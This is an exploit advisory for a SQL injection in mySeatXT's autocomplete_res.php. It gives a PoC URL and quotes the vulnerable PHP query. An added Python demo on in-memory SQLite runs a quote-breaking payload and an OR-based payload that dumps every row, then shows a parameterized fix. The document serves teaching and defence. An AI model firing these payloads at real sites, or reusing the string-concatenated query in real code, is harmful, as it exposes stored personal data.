########################################################################################
# [+] Exploit: mySeatXT 0.2134                                                         #
# [+] Author: vinicius777                                                              #
# [+] Contact: vinicius777 [AT] gmail@vinicius777_                                     #
# [+] Vendor Homepage: http://sourceforge.net/projects/myseat                          #
########################################################################################

[1] SQL Injection

PoC:

http://localhost/mySeatXT/web/ajax/autocomplete_res.php?term=99' ['SQL INJECT']

Vulnerable Code:

[+] autocomplete_res.php

$sql = "SELECT * FROM reservations WHERE reservation_guest_name LIKE '".$_GET['term']."%' GROUP BY reservation_guest_name ";
$fetch = mysql_query($sql);

The `term` parameter is concatenated straight into the LIKE literal, so a single quote in the request closes the string early. The PoC above (`term=99'`) produces an unbalanced quote and a MySQL syntax error; a payload that keeps the quotes balanced instead alters the WHERE clause, and because the legacy mysql_query() call runs the string as-is there is no escaping or binding in between.

#
#
# Greetz to g0tm1lk and TheColonial.
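The following is an added example, not part of the advisory or of mySeatXT itself: it rebuilds the vulnerable query from autocomplete_res.php in Python against an in-memory SQLite table with constructed sample rows, runs the advisory's `99'` PoC and a balanced-quote payload (`' OR '1%'='1`, which turns the clause into `LIKE '' OR '1%'='1%'`) through it, and shows a parameterized version of the same lookup that binds `term` as data. The table layout, column names beyond `reservation_guest_name`, and the sample guests are assumptions made for the demo; SQLite stands in for MySQL, and both parse the payloads the same way here.

```python
import sqlite3

# Constructed sample data, not taken from mySeatXT; stands in for its reservations table.
# The id/reservation_date columns are assumed for the demo.
SAMPLE_ROWS = [
    (1, "Alice", "2011-03-01"),
    (2, "Alicia", "2011-03-02"),
    (3, "Bob", "2011-03-03"),
]


def make_db():
    """Build an in-memory table shaped like the one the vulnerable query reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE reservations ("
        "id INTEGER PRIMARY KEY, reservation_guest_name TEXT, reservation_date TEXT)"
    )
    conn.executemany("INSERT INTO reservations VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, term):
    """Mirrors autocomplete_res.php: $_GET['term'] is pasted into the LIKE literal."""
    sql = (
        "SELECT * FROM reservations WHERE reservation_guest_name LIKE '"
        + term
        + "%' GROUP BY reservation_guest_name"
    )
    return conn.execute(sql).fetchall()


def safe_lookup(conn, term):
    """Parameterized equivalent: term is bound as a value, the wildcard is appended server-side."""
    sql = (
        "SELECT * FROM reservations WHERE reservation_guest_name LIKE ? "
        "GROUP BY reservation_guest_name"
    )
    return conn.execute(sql, (term + "%",)).fetchall()


def probe(conn, term):
    """Run a term through the vulnerable query.

    Returns ('error', message) when the concatenated SQL no longer parses
    (the advisory's 99' PoC), else ('rows', number_of_rows_returned).
    """
    try:
        return ("rows", len(vulnerable_lookup(conn, term)))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for t in ["Ali", "99'", "' OR '1%'='1"]:
        print(
            repr(t),
            "vulnerable:", probe(db, t),
            "parameterized:", len(safe_lookup(db, t)),
        )
```

With the sample data, `Ali` returns two grouped rows from both lookups, `99'` breaks the concatenated query with a syntax error while the parameterized one simply finds no guest named `99'`, and `' OR '1%'='1` dumps every guest through the vulnerable path but matches nothing through the bound parameter. In PHP the equivalent fix is a mysqli or PDO prepared statement with a `?` placeholder and `$_GET['term'] . '%'` bound as the value; the legacy mysql_* extension used here has no parameter binding at all. One caveat that binding does not address: `%` and `_` inside `term` still act as LIKE wildcards, so an autocomplete endpoint that must treat them literally should also escape them and add an `ESCAPE` clause.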